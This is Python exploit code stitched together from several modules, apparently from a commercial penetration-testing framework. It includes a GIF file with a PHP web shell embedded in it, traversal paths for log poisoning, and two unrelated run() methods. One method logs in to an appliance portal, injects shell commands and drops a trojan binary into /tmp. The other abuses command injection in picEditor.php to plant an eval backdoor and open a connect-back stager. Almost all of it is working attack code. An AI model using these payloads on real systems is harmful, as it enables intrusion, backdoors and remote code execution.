    self.name=""
    self.webserverport=0 #set to non-zero to make it an RFI exploit
    # GIF header/palette bytes, the PHP shell, then more GIF bytes and the
    # 0x3b trailer.  Do not reflow: the exact byte sequence is the payload.
    self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
        chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
        chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
        chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
        chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
        chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+\
        """<?php error_reporting(0); ini_set('max_execution_time',0); print 'startz'; passthru(base64_decode($_REQUEST[SERVER_INFO])); eval(base64_decode($_REQUEST[SERVER_INFO2])); print 'endz'; exit; ?>"""+\
        chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
        chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
        chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
        chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
        chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
        chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
        chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
        chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
        chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
        chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
        chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
        chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
        chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
        chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
        chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
        chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
        chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
        chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
        chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
        chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
        chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
        chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
        chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
        chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
        chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
        chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
        chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
        chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
        chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
        chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
        chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
        chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
        chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
        chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
        chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
        chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
        chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
        chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
        chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
        chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
        chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
        chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
        chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
        chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
        chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
        chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
        chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
        chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
        chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
        chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
        chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
        chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
        chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
        chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
        chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
        chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
        chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
        chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
        chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
        chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
        chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
        chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
        chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
        chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
        chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
        chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
        chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)
    # Traversal candidates for Apache log files, at varying depths; which
    # method walks this list is not visible here.
    self.log_paths = [
        "../../../../../../var/log/apache2/access.log",
        "../../../../../../var/log/apache2/error.log",
        "../../../../../var/log/apache2/access.log",
        "../../../../../var/log/apache2/error.log",
        "../../../../../var/log/httpd/access_log",
        "../../../../../var/log/httpd/error_log",
        "../apache/logs/error.log",
        "../apache/logs/access.log",
        "../../apache/logs/error.log",
        "../../apache/logs/access.log",
        "../../../apache/logs/error.log",
        "../../../apache/logs/access.log",
        "../../../../apache/logs/error.log",
        "../../../../apache/logs/access.log",
        "../../../../../apache/logs/error.log",
        "../../../../../apache/logs/access.log",
        "../logs/error.log",
        "../logs/access.log",
        "../../logs/error.log",
        "../../logs/access.log",
        "../../../logs/error.log",
        "../../../logs/access.log",
        "../../../../logs/error.log",
        "../../../../logs/access.log",
        "../../../../../logs/error.log",
        "../../../../../logs/access.log",
        "../../../../../etc/httpd/logs/access_log",
        "../../../../../etc/httpd/logs/access.log",
        "../../../../../etc/httpd/logs/error_log",
        "../../../../../etc/httpd/logs/error.log",
        "../../../../../var/www/logs/access_log",
        "../../../../../var/www/logs/access.log",
        "../../../../../usr/local/apache/logs/access_log",
        "../../../../../usr/local/apache/logs/access.log",
        "../../../../../var/log/apache/access_log",
        "../../../../../var/log/apache/access.log",
        "../../../../../var/log/access_log",
        "../../../../../var/www/logs/error_log",
        "../../../../../var/www/logs/error.log",
        "../../../../../usr/local/apache/logs/error_log",
        "../../../../../usr/local/apache/logs/error.log",
        "../../../../../var/log/apache/error_log",
        "../../../../../var/log/apache/error.log",
        "../../../../../var/log/access_log",
        "../../../../../var/log/error_log",
        "../../../../../../var/log/apache2/error.log"]
    # Browser User-Agent strings (usage not visible in this method).
    self.useragents = [
        "Googlebot/2.1 ( http://www.google.com/bot.html)",
        "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
        "Mozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)",
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0)",
        "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
        "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20070321 Netscape/9.0",
        "Opera/9.23 (Windows NT 5.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.8 [en] (Windows NT 6.0; U)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4",
        "Opera/9.20 (X11; Linux i686; U; en)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy)",
        "Opera/9.10 (Windows NT 5.1; U; en)",
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12",
        "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.3 (like Gecko)",
        "Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4",
        "Opera/9.23 (X11; FreeBSD 6 i386; U; en)",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5"]
def run(self):
    """Log in to the appliance's VirtualOffice portal and run a command.

    ``port``, ``username``, ``password`` and ``cmd`` are read from
    ``self.argsDict``.  An empty ``cmd`` means trojan mode: the MOSDEF trojan
    is built, hex-escaped into a ``printf`` one-liner that recreates it under
    /tmp, and delivered through ``self.split_cmd``.  Otherwise the command is
    sent with ``self.send_cmd`` with its output redirected to
    ``/usr/src/EasyAccess/www/htdocs/images/d2``, which is then fetched back
    over HTTP.

    Returns:
        0 when the login is rejected or the result page says "not available",
        1 when the output could be read and logged.
    """
    args = self.argsDict
    self.host = self.target.interface
    self.port = int(args.get("port", self.port))
    self.username = args.get("username", self.username)
    self.password = args.get("password", self.password)

    requested_cmd = args.get("cmd", self.cmd)
    if requested_cmd == "":
        self.maketrojan()
        # printf "\x..\x.." rebuilds the trojan bytes on the target.
        hex_s = "".join("\\x%02x" % ord(b) for b in self.mosdeftrojan)
        self.TROJANMODE = 1
        self.cmd = "printf \"" + hex_s + "\" > /tmp/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
    else:
        self.cmd = requested_cmd

    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))

    def absurl(path):
        return "%s://%s:%d%s" % (self.protocol, self.host, self.port, path)

    agent = spkproxy.UserAgent("", exploit=self)
    agent.addHeader(
        "User-Agent",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    )

    # Authentication (the '******' literal is kept exactly as found).
    login_form = urllib.urlencode({
        'username': self.username,
        'password': self.password,
        'domain': 'LocalDomain',
        'loginButton': 'Login',
        'state': 'login',
        'login': '******',
        'verifyCert': '0',
        'portalname': 'VirtualOffice',
        'ajax': 'true'
    })
    reply = agent.POST(absurl("/cgi-bin/userLogin"), login_form)
    if "Login failed" in reply:
        self.log('[D2SEC] Authentication error')
        return 0

    # Exploitation
    if self.TROJANMODE == 1:
        self.split_cmd(agent, hex_s)
    else:
        output_file = '/usr/src/EasyAccess/www/htdocs/images/d2'
        self.send_cmd(agent, 'rm -f ' + output_file)
        self.cmd = '%s > %s' % (self.cmd, output_file)
        self.send_cmd(agent, self.cmd)

    # Collect the command output from the web root.
    reply = agent.GET(absurl("/images/d2"))
    if 'not available' in reply:
        self.log('[D2SEC] Result not available')
        return 0
    self.log('[D2SEC] %s' % reply)
    return 1
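def run(self):
    """Exploit the picEditor.php command injection and run a command.

    ``self.getargs()`` supplies the target settings; with ``self.version`` at
    0 the target is first probed with ``self.test()``.  The injection (shell
    metacharacters in the ``angle`` parameter of picEditor.php) copies
    anycontent.php to albums/edit/index.php and rewrites it into an
    ``@eval($_GET[c])`` backdoor.  The payload sent through ``c`` is either
    ``self.command`` wrapped in passthru() between startz/endz markers, or
    the PHP MOSDEF stager from ``get_php_to_mosdef()``.

    Returns:
        1 when the command output (or the MOSDEF callback) was observed,
        0 otherwise.  ``ret`` is now initialised so the "command not run"
        path no longer raises NameError at the final ``if ret``.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    if self.version == 0:
        if not self.test():
            self.log("Testing didn't find vulnerable target")
            return 0
    self.log("Attacking %s:%d" % (self.host, self.port))
    self.log("Basic Auth User: %s" % self.basicauth_user)
    self.log("VHost: %s" % self.hostname)
    if self.ssl:
        protocol = "https"
    else:
        protocol = "http"
    # If we have to do basic-auth, let's get an object from spkproxy here
    if self.basicauth_user:
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    else:
        auth = None
    # NOTE(review): self.port is logged but not part of this base URL --
    # confirm spkproxy/basepath account for a non-default port.
    UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" + self.basepath,
                            auth=auth, hostname=self.hostname, exploit=self)

    # Same injection for both modes, hoisted so the two branches cannot drift.
    inject = "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;"

    ret = 0
    if self.command:
        self.log("Command: %s" % self.command)
        # self.command is spliced into a single-quoted PHP literal; a "'" in
        # it breaks the payload.
        command = "print(startz);passthru('" + self.command + "');print(endz);"
        UA.POST("picEditor.php", inject)
        data = UA.GET("albums/edit/index.php?c=%s" % (urllib.quote_plus(command)))
        if "startz" in data:
            result = data.split("startz")[1].split("endz")[0]
            self.log("Command result=%s" % prettyprint(result))
            ret = 1
        else:
            self.log("Command not run - service patched?!")
    else:
        command = self.get_php_to_mosdef().strip()
        # Every "/" is rebuilt from `pwd` on the target -- presumably to keep
        # literal slashes out of the injected code; TODO confirm why.
        command = command.replace("/", "`pwd|cut -b1`")
        self.log("Command: %s" % command)
        self.log("Sending Exploit")
        UA.POST("picEditor.php", inject)
        data = UA.GET("albums/edit/index.php?c=%s" % (urllib.quote_plus(command)))
        self.log("Data=%s" % data)
        self.log("Looking for PHP connectback")
        ret = self.ISucceeded()

    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret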